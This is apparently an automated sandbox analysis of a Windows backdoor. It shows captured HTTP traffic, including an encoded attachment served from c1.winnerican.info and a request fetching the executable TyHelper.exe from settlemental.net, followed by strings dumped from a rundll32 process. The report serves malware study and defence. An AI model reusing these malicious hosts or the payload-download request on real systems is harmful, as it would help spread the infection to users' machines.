User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:56 GMT
Content-Type: text/html
Content-Length: 10474
Connection: close
Content-Disposition: attachment; filename="1_1_3.txt"
..c.C.N.s.u.2.L. .n. .f.F.c.U./.V.N.P.M.u.6.x.W.F.j.w.7.d.M.9.5.K.H.Q.w.X.X.L.c.t.n.V.Q.5.b.e.k.z.Q.1.1.a.s.8.2.7.L.T.w.b.g.l.t.Z.1.n.h.6.2.W.G.Y.2.5.u.y.R.t.G.X.L.3.X.K.f.b.W.F.q.6.Z.Q.P. .J.S.F.N.l.Z.4.z.4.J.4.V.1.g.R.5.w.t.0.Z.j.w.y.N.f.q.E.c.q./.N.1./.m.v.o.j.G.T.F.Y./.k.t.A.C.C.a.i.7.O.I.c.2.N.a.X.x.7.T.l.N.o.V.i.X.Y.j.8.U.l.m.P.J.v.E.j.p.p.k.E.i.O.S.H.4.s.n.G.q.R.k.S.M. .n.A.A.m.1.8.O.P. .c.H.F.P.K.7.C.R.f.Y.Z.O.W.i.E.9.7.H.V.v.L.q.M.X.I.A.2.X.x.q.g.J.c.r.s.Y.U.7.Z.z.V.2.t.Q. .9.E.r.i.l.A.W.t.5.N.O.j.N.s.B.W.W.B.p.g.e.2.M.O.J.6.t.k.F. .A.x.R.A.t.D.T.T.S.6. .X.Q.k.0.2.Z.0.0.J.B.E.l.Z.b.7.x.z.G.l.k.I.g.Y.N.O.F.r.Z.V.D.5.F.v.c.h./.z.x.z.d.p.U.g.V.k.9.h.d.N.d.6.W.K.e.N.p.G.B.3. .K.a.k.K.H.y.m.3.X.Y.L.j.s.Y.P.w.4.Q. .H.Q.I.c.Q.6.S.t.i.J.4.s.2.q.b.g.p.c.e.1.k.i.u.8.t.v.d.p.w.w.C.J.m.j.G.C.X.N.Z.r.i.U.A.7.Y.P.t.D.v.p.P.W.y.i.0.m.X.M.7.G.o.X.a.l. .c.l.m.4.z.f.Q.U.q.A.A.w.O.b.7.Y.s.f.T.9.S.I.3.C.M.J.S.W.D.I.b.4.N.2.W.v.p.4.W.k.k.3.i.h.K.A.v.W.i.u.Y.U./.L.E.V.T.W.T.X.g. .A.j.5.0.3.N.9.o.0.k.C.N.W.7.Q.a.s.0.x.0.i.I.T.r.9.H.h.Y.Z./.M.D.N.W.7.U.6.8.H.8.Y.o.B.o.0.a.Y.5.x.8.v.u.r.Q.B.c.u.g.G.I.j.p.4.H.V.A.I.5.d.T.O.8.6.D.H.Z.A.O.H.K.k.V.Q.E.r.4.Q.t.h.M.q.w.g.F.T.z.3.J.u.D.z.E.b.t.A.e.q.K.p.4.1.5.b.G.6.M.6.2.H.N.a.S.x.k.J.N.N.A.F.K.q.L.X.q.s.Q.d.o.K.4.u.4.b.P.C.w.E.B.d.y.C.c. .V.F.t.q.S.H.1.U.V.1.t./.K.Z.i.2.w.b.8.K.3.W.h.M.s.u.U.6.J.b.F.N.7.8.3.F.A.E.x.8.H.t.K.J.m.R.V.N.T.o.y.o.v.P.2.H.H.l.w.8.E.4.g.j.m.0.q.g.f.f.R.3.o.f.a.b.M.u./.W.Y.G.c.h.D.S.A.o.i.x.I.W.p.P.L.j.f.7.d.T.5.b.B.w.V.Q.Z.m.R.B.Y.e.a.6.H.B.R.1.b.I.o.H.Q.X.
<<< skipped >>>
GET /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive
<<< skipped >>>
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
rundll32.exe_1324:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
IMAGEHLP.dll
IMAGEHLP.dll
rundll32.pdb
rundll32.pdb
.....eZXnnnnnnnnnnnn3
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
O3$dS7"%U9
.manifest
.manifest
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
RUNDLL.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
YThere is not enough memory to run the file %s.
YThere is not enough memory to run the file %s.
Please close other windows and try again.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Error in %s
Missing entry:%s
Missing entry:%s
Error loading %s
Error loading %s